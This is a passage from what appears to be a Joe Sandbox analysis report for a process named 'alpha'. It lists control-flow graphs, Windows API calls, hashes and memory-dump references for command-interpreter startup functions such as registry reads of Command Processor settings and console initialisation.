                                                      control_flow_graph 579 7ff7e1dc5554-7ff7e1dc55b9 call 7ff7e1dca640 582 7ff7e1dc55bc-7ff7e1dc55e8 RegOpenKeyExW 579->582 583 7ff7e1dc5887-7ff7e1dc588e 582->583 584 7ff7e1dc55ee-7ff7e1dc5631 RegQueryValueExW 582->584 583->582 587 7ff7e1dc5894-7ff7e1dc58db time srand call 7ff7e1dc8f80 583->587 585 7ff7e1dc5637-7ff7e1dc5675 RegQueryValueExW 584->585 586 7ff7e1dcf248-7ff7e1dcf24d 584->586 588 7ff7e1dc5677-7ff7e1dc567c 585->588 589 7ff7e1dc568e-7ff7e1dc56cc RegQueryValueExW 585->589 591 7ff7e1dcf24f-7ff7e1dcf25b 586->591 592 7ff7e1dcf260-7ff7e1dcf265 586->592 593 7ff7e1dc5682-7ff7e1dc5687 588->593 594 7ff7e1dcf28b-7ff7e1dcf290 588->594 595 7ff7e1dc56d2-7ff7e1dc5710 RegQueryValueExW 589->595 596 7ff7e1dcf2b6-7ff7e1dcf2bb 589->596 591->585 592->585 598 7ff7e1dcf26b-7ff7e1dcf286 _wtol 592->598 593->589 594->589 601 7ff7e1dcf296-7ff7e1dcf2b1 _wtol 594->601 599 7ff7e1dc5712-7ff7e1dc5717 595->599 600 7ff7e1dc5729-7ff7e1dc5767 RegQueryValueExW 595->600 602 7ff7e1dcf2bd-7ff7e1dcf2c9 596->602 603 7ff7e1dcf2ce-7ff7e1dcf2d3 596->603 598->585 605 7ff7e1dc571d-7ff7e1dc5722 599->605 606 7ff7e1dcf2f9-7ff7e1dcf2fe 599->606 607 7ff7e1dc579f-7ff7e1dc57dd RegQueryValueExW 600->607 608 7ff7e1dc5769-7ff7e1dc576e 600->608 601->589 602->595 603->595 604 7ff7e1dcf2d9-7ff7e1dcf2f4 _wtol 603->604 604->595 605->600 606->600 609 7ff7e1dcf304-7ff7e1dcf31a wcstol 606->609 612 7ff7e1dc57e3-7ff7e1dc57e8 607->612 613 7ff7e1dcf3a9 607->613 610 7ff7e1dcf320-7ff7e1dcf325 608->610 611 7ff7e1dc5774-7ff7e1dc578f 608->611 609->610 614 7ff7e1dcf34b 610->614 615 7ff7e1dcf327-7ff7e1dcf33f wcstol 610->615 616 7ff7e1dc5795-7ff7e1dc5799 611->616 617 7ff7e1dcf357-7ff7e1dcf35e 611->617 618 7ff7e1dcf363-7ff7e1dcf368 612->618 619 7ff7e1dc57ee-7ff7e1dc5809 612->619 620 7ff7e1dcf3b5-7ff7e1dcf3b8 613->620 614->617 615->614 616->607 616->617 617->607 621 7ff7e1dcf38e 618->621 622 7ff7e1dcf36a-7ff7e1dcf382 wcstol 618->622 623 7ff7e1dc580f-7ff7e1dc5813 619->623 624 7ff7e1dcf39a-7ff7e1dcf39d 619->624 625 7ff7e1dcf3be-7ff7e1dcf3c5 620->625 626 7ff7e1dc582c 620->626 621->624 622->621 623->624 627 7ff7e1dc5819-7ff7e1dc5823 623->627 624->613 629 7ff7e1dc5832-7ff7e1dc5870 RegQueryValueExW 625->629 626->629 630 7ff7e1dcf3ca-7ff7e1dcf3d1 626->630 627->620 628 7ff7e1dc5829 627->628 628->626 631 7ff7e1dc5876-7ff7e1dc5882 RegCloseKey 629->631 632 7ff7e1dcf3dd-7ff7e1dcf3e2 629->632 630->632 631->583 633 7ff7e1dcf433-7ff7e1dcf439 632->633 634 7ff7e1dcf3e4-7ff7e1dcf412 ExpandEnvironmentStringsW 632->634 633->631 635 7ff7e1dcf43f-7ff7e1dcf44c call 7ff7e1dbb900 633->635 636 7ff7e1dcf414-7ff7e1dcf426 call 7ff7e1dc13e0 634->636 637 7ff7e1dcf428 634->637 635->631 640 7ff7e1dcf42e 636->640 637->640 640->633
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseOpensrandtime
                                                      • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                      • API String ID: 145004033-3846321370
                                                      • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                      • Instruction ID: 77d591e3446ce0f2fca22fb1cff1ccbbca039bd77c76ae0072d5dfcad2d33457
                                                      • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                                      • Instruction Fuzzy Hash: CCE19632A1DA82D6EB50EB10E4417BAF7A0FB88741FC05537E58E42A58DFBCD544CB62
                                                      Function 00007FF7E1DC37D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269registrythreadmemoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 821 7ff7e1dc37d8-7ff7e1dc3887 GetCurrentThreadId OpenThread call 7ff7e1dc04f4 HeapSetInformation RegOpenKeyExW 824 7ff7e1dce9f8-7ff7e1dcea3b RegQueryValueExW RegCloseKey 821->824 825 7ff7e1dc388d-7ff7e1dc38eb call 7ff7e1dc5920 GetConsoleOutputCP GetCPInfo 821->825 827 7ff7e1dcea41-7ff7e1dcea59 GetThreadLocale 824->827 825->827 831 7ff7e1dc38f1-7ff7e1dc3913 memset 825->831 829 7ff7e1dcea74-7ff7e1dcea77 827->829 830 7ff7e1dcea5b-7ff7e1dcea67 827->830 834 7ff7e1dcea94-7ff7e1dcea96 829->834 835 7ff7e1dcea79-7ff7e1dcea7d 829->835 830->829 832 7ff7e1dceaa5 831->832 833 7ff7e1dc3919-7ff7e1dc3935 call 7ff7e1dc4d5c 831->833 838 7ff7e1dceaa8-7ff7e1dceab4 832->838 842 7ff7e1dceae2-7ff7e1dceaff call 7ff7e1db3240 call 7ff7e1dd8530 call 7ff7e1dc4c1c 833->842 843 7ff7e1dc393b-7ff7e1dc3942 833->843 834->832 835->834 837 7ff7e1dcea7f-7ff7e1dcea89 835->837 837->834 838->833 840 7ff7e1dceaba-7ff7e1dceac3 838->840 841 7ff7e1dceacb-7ff7e1dceace 840->841 844 7ff7e1dceac5-7ff7e1dceac9 841->844 845 7ff7e1dcead0-7ff7e1dceadb 841->845 853 7ff7e1dceb00-7ff7e1dceb0d 842->853 847 7ff7e1dc3948-7ff7e1dc3962 _setjmp 843->847 848 7ff7e1dceb27-7ff7e1dceb40 _setjmp 843->848 844->841 845->838 851 7ff7e1dceadd 845->851 847->853 854 7ff7e1dc3968-7ff7e1dc396d 847->854 849 7ff7e1dceb46-7ff7e1dceb49 848->849 850 7ff7e1dc39fe-7ff7e1dc3a05 call 7ff7e1dc4c1c 848->850 856 7ff7e1dceb66-7ff7e1dceb6f call 7ff7e1dc01b8 849->856 857 7ff7e1dceb4b-7ff7e1dceb65 call 7ff7e1db3240 call 7ff7e1dd8530 call 7ff7e1dc4c1c 849->857 850->824 851->833 867 7ff7e1dceb15-7ff7e1dceb1f call 7ff7e1dc4c1c 853->867 859 7ff7e1dc396f 854->859 860 7ff7e1dc39b9-7ff7e1dc39bb 854->860 880 7ff7e1dceb71-7ff7e1dceb82 _setmode 856->880 881 7ff7e1dceb87-7ff7e1dceb89 call 7ff7e1dc86f0 856->881 857->856 868 7ff7e1dc3972-7ff7e1dc397d 859->868 863 7ff7e1dc39c1-7ff7e1dc39c3 call 7ff7e1dc4c1c 860->863 864 7ff7e1dceb20 860->864 877 7ff7e1dc39c8 863->877 864->848 867->864 874 7ff7e1dc397f-7ff7e1dc3984 868->874 875 7ff7e1dc39c9-7ff7e1dc39de call 7ff7e1dbdf60 868->875 874->868 883 7ff7e1dc3986-7ff7e1dc39ae call 7ff7e1dc0580 GetConsoleOutputCP GetCPInfo call 7ff7e1dc04f4 874->883 875->867 891 7ff7e1dc39e4-7ff7e1dc39e8 875->891 877->875 880->881 888 7ff7e1dceb8e-7ff7e1dcebad call 7ff7e1dc58e4 call 7ff7e1dbdf60 881->888 897 7ff7e1dc39b3 883->897 902 7ff7e1dcebaf-7ff7e1dcebb3 888->902 891->850 895 7ff7e1dc39ea-7ff7e1dc39ef call 7ff7e1dbbe00 891->895 900 7ff7e1dc39f4-7ff7e1dc39fc 895->900 897->860 900->874 902->850 903 7ff7e1dcebb9-7ff7e1dcec24 call 7ff7e1dc58e4 GetConsoleOutputCP GetCPInfo call 7ff7e1dc04f4 call 7ff7e1dbbe00 call 7ff7e1dc0580 GetConsoleOutputCP GetCPInfo call 7ff7e1dc04f4 902->903 903->888
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                      • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                      • API String ID: 2624720099-1920437939
                                                      • Opcode ID: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                      • Instruction ID: 47d1fd29b5b00acabf864d9dbf6b996e61c36cb48728def3869b3f6a398cf110
                                                      • Opcode Fuzzy Hash: 8dcb79cde60ee5e49f11697ed5384324bb8acc00ab40d250c7b11be42b6fa51b
                                                      • Instruction Fuzzy Hash: 4CC1E071F086429AF714FB6498423BDFAA0FF49744FC4853BD90E86695DEBCA440C7A2
                                                      Function 00007FF7E1DC823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1118 7ff7e1dc823c-7ff7e1dc829b FindFirstFileExW 1119 7ff7e1dc82cd-7ff7e1dc82df 1118->1119 1120 7ff7e1dc829d-7ff7e1dc82a9 GetLastError 1118->1120 1124 7ff7e1dc8365-7ff7e1dc837b FindNextFileW 1119->1124 1125 7ff7e1dc82e5-7ff7e1dc82ee 1119->1125 1121 7ff7e1dc82af 1120->1121 1123 7ff7e1dc82b1-7ff7e1dc82cb 1121->1123 1127 7ff7e1dc83d0-7ff7e1dc83e5 FindClose 1124->1127 1128 7ff7e1dc837d-7ff7e1dc8380 1124->1128 1126 7ff7e1dc82f1-7ff7e1dc82f4 1125->1126 1130 7ff7e1dc82f6-7ff7e1dc8300 1126->1130 1131 7ff7e1dc8329-7ff7e1dc832b 1126->1131 1127->1126 1128->1119 1129 7ff7e1dc8386 1128->1129 1129->1120 1132 7ff7e1dc8332-7ff7e1dc8353 GetProcessHeap HeapAlloc 1130->1132 1133 7ff7e1dc8302-7ff7e1dc830e 1130->1133 1131->1121 1134 7ff7e1dc832d 1131->1134 1137 7ff7e1dc8356-7ff7e1dc8363 1132->1137 1135 7ff7e1dc8310-7ff7e1dc8313 1133->1135 1136 7ff7e1dc838b-7ff7e1dc83c2 GetProcessHeap HeapReAlloc 1133->1136 1134->1120 1140 7ff7e1dc8315-7ff7e1dc8323 1135->1140 1141 7ff7e1dc8327 1135->1141 1138 7ff7e1dd50f8-7ff7e1dd511e GetLastError FindClose 1136->1138 1139 7ff7e1dc83c8-7ff7e1dc83ce 1136->1139 1137->1135 1138->1123 1139->1137 1140->1141 1141->1131
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileFindFirstLast
                                                      • String ID:
                                                      • API String ID: 873889042-0
                                                      • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                      • Instruction ID: 158bb9ef9b0325c1935fa0e7ccece0d372344554734bac7449e1d756c1d438cb
                                                      • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                      • Instruction Fuzzy Hash: 70516D71A09B4686E700EF11E445779FBA1FB49B82F859532CA1D43354CFBCE464CB61
                                                      Function 00007FF7E1DC2978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1142 7ff7e1dc2978-7ff7e1dc29b6 1143 7ff7e1dc29b9-7ff7e1dc29c1 1142->1143 1143->1143 1144 7ff7e1dc29c3-7ff7e1dc29c5 1143->1144 1145 7ff7e1dce441 1144->1145 1146 7ff7e1dc29cb-7ff7e1dc29cf 1144->1146 1147 7ff7e1dc29d2-7ff7e1dc29da 1146->1147 1148 7ff7e1dc2a1e-7ff7e1dc2a3e FindFirstFileW 1147->1148 1149 7ff7e1dc29dc-7ff7e1dc29e1 1147->1149 1150 7ff7e1dce435-7ff7e1dce439 1148->1150 1151 7ff7e1dc2a44-7ff7e1dc2a5c FindClose 1148->1151 1149->1148 1152 7ff7e1dc29e3-7ff7e1dc29eb 1149->1152 1150->1145 1153 7ff7e1dc2a62-7ff7e1dc2a6e 1151->1153 1154 7ff7e1dc2ae3-7ff7e1dc2ae5 1151->1154 1152->1147 1155 7ff7e1dc29ed-7ff7e1dc2a1c call 7ff7e1dc8f80 1152->1155 1156 7ff7e1dc2a70-7ff7e1dc2a78 1153->1156 1157 7ff7e1dce3f7-7ff7e1dce3ff 1154->1157 1158 7ff7e1dc2aeb-7ff7e1dc2b10 _wcsnicmp 1154->1158 1156->1156 1160 7ff7e1dc2a7a-7ff7e1dc2a8d 1156->1160 1158->1153 1161 7ff7e1dc2b16-7ff7e1dce3f1 _wcsicmp 1158->1161 1160->1145 1163 7ff7e1dc2a93-7ff7e1dc2a97 1160->1163 1161->1153 1161->1157 1165 7ff7e1dce404-7ff7e1dce407 1163->1165 1166 7ff7e1dc2a9d-7ff7e1dc2ade memmove call 7ff7e1dc13e0 1163->1166 1168 7ff7e1dce40b-7ff7e1dce413 1165->1168 1166->1152 1168->1168 1170 7ff7e1dce415-7ff7e1dce42b memmove 1168->1170 1170->1150
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                      • Instruction ID: ec894e96bb4b6e7506576d69eb1ec3dc8df868198d466ed4926a31adc3a0c872
                                                      • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                      • Instruction Fuzzy Hash: 0F510462B0868285EB30EB15A9463BAE690FB84BE4FC44632DE6E476D0DF7CE441C651
                                                      Function 00007FF7E1DC4D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 643 7ff7e1dc4d5c-7ff7e1dc4e4b InitializeCriticalSection call 7ff7e1dc58e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7e1dc0580 call 7ff7e1dc4a14 call 7ff7e1dc4ad0 call 7ff7e1dc5554 GetCommandLineW 654 7ff7e1dc4e4d-7ff7e1dc4e54 643->654 654->654 655 7ff7e1dc4e56-7ff7e1dc4e61 654->655 656 7ff7e1dc51cf-7ff7e1dc51e3 call 7ff7e1db3278 call 7ff7e1dc4c1c 655->656 657 7ff7e1dc4e67-7ff7e1dc4e7b call 7ff7e1dc2e44 655->657 662 7ff7e1dc4e81-7ff7e1dc4ec3 GetCommandLineW call 7ff7e1dc13e0 call 7ff7e1dbca40 657->662 663 7ff7e1dc51ba-7ff7e1dc51ce call 7ff7e1db3278 call 7ff7e1dc4c1c 657->663 662->663 674 7ff7e1dc4ec9-7ff7e1dc4ee8 call 7ff7e1dc417c call 7ff7e1dc2394 662->674 663->656 678 7ff7e1dc4eed-7ff7e1dc4ef5 674->678 678->678 679 7ff7e1dc4ef7-7ff7e1dc4f1f call 7ff7e1dbaa54 678->679 682 7ff7e1dc4f21-7ff7e1dc4f30 679->682 683 7ff7e1dc4f95-7ff7e1dc4fee GetConsoleOutputCP GetCPInfo call 7ff7e1dc51ec GetProcessHeap HeapAlloc 679->683 682->683 685 7ff7e1dc4f32-7ff7e1dc4f39 682->685 689 7ff7e1dc5012-7ff7e1dc5018 683->689 690 7ff7e1dc4ff0-7ff7e1dc5006 GetConsoleTitleW 683->690 685->683 687 7ff7e1dc4f3b-7ff7e1dc4f77 call 7ff7e1db3278 GetWindowsDirectoryW 685->687 695 7ff7e1dc51b1-7ff7e1dc51b9 call 7ff7e1dc4c1c 687->695 696 7ff7e1dc4f7d-7ff7e1dc4f90 call 7ff7e1dc3c24 687->696 693 7ff7e1dc507a-7ff7e1dc507e 689->693 694 7ff7e1dc501a-7ff7e1dc5024 call 7ff7e1dc3578 689->694 690->689 692 7ff7e1dc5008-7ff7e1dc500f 690->692 692->689 697 7ff7e1dc5080-7ff7e1dc50b3 call 7ff7e1ddb89c call 7ff7e1db586c call 7ff7e1db3240 call 7ff7e1dc3448 693->697 698 7ff7e1dc50eb-7ff7e1dc5161 GetModuleHandleW GetProcAddress * 3 693->698 694->693 709 7ff7e1dc5026-7ff7e1dc5030 694->709 695->663 696->683 724 7ff7e1dc50d2-7ff7e1dc50d7 call 7ff7e1db3278 697->724 725 7ff7e1dc50b5-7ff7e1dc50d0 call 7ff7e1dc3448 * 2 697->725 702 7ff7e1dc516f 698->702 703 7ff7e1dc5163-7ff7e1dc5167 698->703 708 7ff7e1dc5172-7ff7e1dc51af free call 7ff7e1dc8f80 702->708 703->702 707 7ff7e1dc5169-7ff7e1dc516d 703->707 707->702 707->708 713 7ff7e1dc5032-7ff7e1dc5059 GetStdHandle GetConsoleScreenBufferInfo 709->713 714 7ff7e1dc5075 call 7ff7e1ddcff0 709->714 718 7ff7e1dc5069-7ff7e1dc5073 713->718 719 7ff7e1dc505b-7ff7e1dc5067 713->719 714->693 718->693 718->714 719->693 728 7ff7e1dc50dc-7ff7e1dc50e6 GlobalFree 724->728 725->728 728->698
                                                      APIs
                                                      • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4D9A
                                                        • Part of subcall function 00007FF7E1DC58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7E1DDC6DB), ref: 00007FF7E1DC58EF
                                                      • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4DBB
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC4DCA
                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4DE0
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DC4DEE
                                                      • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E04
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC0589
                                                        • Part of subcall function 00007FF7E1DC0580: SetConsoleMode.KERNELBASE ref: 00007FF7E1DC059E
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC05AF
                                                        • Part of subcall function 00007FF7E1DC0580: GetConsoleMode.KERNELBASE ref: 00007FF7E1DC05C5
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC05EF
                                                        • Part of subcall function 00007FF7E1DC0580: GetConsoleMode.KERNELBASE ref: 00007FF7E1DC0605
                                                        • Part of subcall function 00007FF7E1DC0580: _get_osfhandle.MSVCRT ref: 00007FF7E1DC0632
                                                        • Part of subcall function 00007FF7E1DC0580: SetConsoleMode.KERNELBASE ref: 00007FF7E1DC0647
                                                        • Part of subcall function 00007FF7E1DC4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                        • Part of subcall function 00007FF7E1DC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                        • Part of subcall function 00007FF7E1DC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                        • Part of subcall function 00007FF7E1DC4A14: memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                        • Part of subcall function 00007FF7E1DC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                        • Part of subcall function 00007FF7E1DC4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AD6
                                                        • Part of subcall function 00007FF7E1DC4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AEF
                                                        • Part of subcall function 00007FF7E1DC5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7E1DC4E35), ref: 00007FF7E1DC55DA
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5623
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5667
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC56BE
                                                        • Part of subcall function 00007FF7E1DC5554: RegQueryValueExW.KERNELBASE ref: 00007FF7E1DC5702
                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E35
                                                      • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4E81
                                                      • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4F69
                                                      • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4F95
                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FB0
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FC1
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FD8
                                                      • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC4FF8
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5037
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC504B
                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC50DF
                                                      • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC50F2
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC510F
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5130
                                                      • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC514A
                                                      • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7E1DC5175
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
